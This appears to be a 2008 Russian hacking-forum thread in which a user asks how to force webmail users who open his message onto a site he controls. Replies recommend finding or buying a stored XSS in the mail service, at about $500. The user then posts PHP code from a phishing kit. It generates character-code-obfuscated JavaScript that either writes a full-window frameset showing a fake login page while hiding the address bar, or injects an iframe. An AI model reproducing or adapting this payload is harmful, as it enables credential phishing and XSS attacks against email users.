Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Редирект при открытии письма |
03.06.2008, 23:14
|
|
Участник форума
Регистрация: 03.06.2008
Сообщений: 174
Провел на форуме:
2902191
Репутация:
45
|
|
Редирект при открытии письма
как можно сделать , когда юзверь находясь в своем почтовом ящике , кликнув на мое письмо , его автоматом перекидывало на определенный сайт?
|
|
|
03.06.2008, 23:17
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Иши активную ксс на почтовом сервисе
|
|
|
|
03.06.2008, 23:17
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Ну смотря какой почтовый сервер.....а вапще это тебе активную Xss надо искать..
|
|
|
|
03.06.2008, 23:41
|
|
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
4444519
Репутация:
476
|
|
Найти xss или купить.
|
|
|
|
03.06.2008, 23:49
|
|
Участник форума
Регистрация: 03.06.2008
Сообщений: 174
Провел на форуме:
2902191
Репутация:
45
|
|
в шкатулке была такая фишка
// А вот сладкая инновация - вставка фрейма в натуральную величину окна,
// что позволило не редиректить жертву на левый хост, а рисовать лживый
// вход прямо в окне браузера, не паля адресную строку
Код:
case 'redirect':
*for($x=0; $x !== strlen($redirect_to); $x++) // Шифруем код для редиректа на фейк
*{
* if($x+1 == strlen($redirect_to)) $kopilka .= ord($redirect_to[$x]);
* else $kopilka .= ord($redirect_to[$x]).',';
*}
$kopilka = '100,111,99,117,109,101,110,11'.'6'.',46,119,114,1'.'0'.'5,116,101,40,39,60,102,114,97,109,101,115,101,116,32,99,111,108,115,'.
'61,49,48,48,37,3'.'2'.',114,111,11'.'9'.',115,61,4'.'9'.',48,48,37,32,98,111,114,100,101,114,'.'6'.'1,48,32,102,114,97,109'.
',101,98,111,114,100,101,114,61,48,32,102,114,97,109,101,115,112,97,99,105,110,103,61,48,62,6'.
'0,102,114,97,109,101,32,102,114,97,109,101,98,111,114,100,101,114,61,48,32,115,114,99,61,34,'.
$kopilka.',34,62,60,47,102,114,97,109,101,115,101,116,62,39,41'; *break;
// Второе новшество - вставка ифрейма
case 'iframe':
*for($x=0; $x !== strlen($iframe_addr); $x++) // Шифруем код для редиректа на фейк
*{
* if($x+1 == strlen($iframe_addr)) $kopilka .= ord($iframe_addr[$x]);
* else $kopilka .= ord($iframe_addr[$x]).',';
*}
$kopilka = '120,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,10'.
'5,102,114,97,109,101,39,41,59,120,46,115,114,99,61,34,'.$kopilka.',34,59,100,111,99,117,109,101,110,116,46,9'.
'8,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,120,41,59'; *break;
default: die('<font face=verdana color=red size=3><b>Выбрана неизвестная начинка для уязвимости!</b></font>');
}
как это можно использовать? |
|
|
|
15.06.2008, 07:20
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
если бы можно было редиректить так просто -то спамеры были бы по гроб жизни обязаны))
PS только через xss -да и то только на каких нить завшивых сервисах...
ибо крупные врядли допустят такую уязвимость
|
|
|
|
16.06.2008, 23:15
|
|
Участник форума
Регистрация: 19.07.2005
Сообщений: 180
Провел на форуме:
904806
Репутация:
52
|
|
купи xss и немороч голову!
но она стоит гдето 500 баксов  |
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
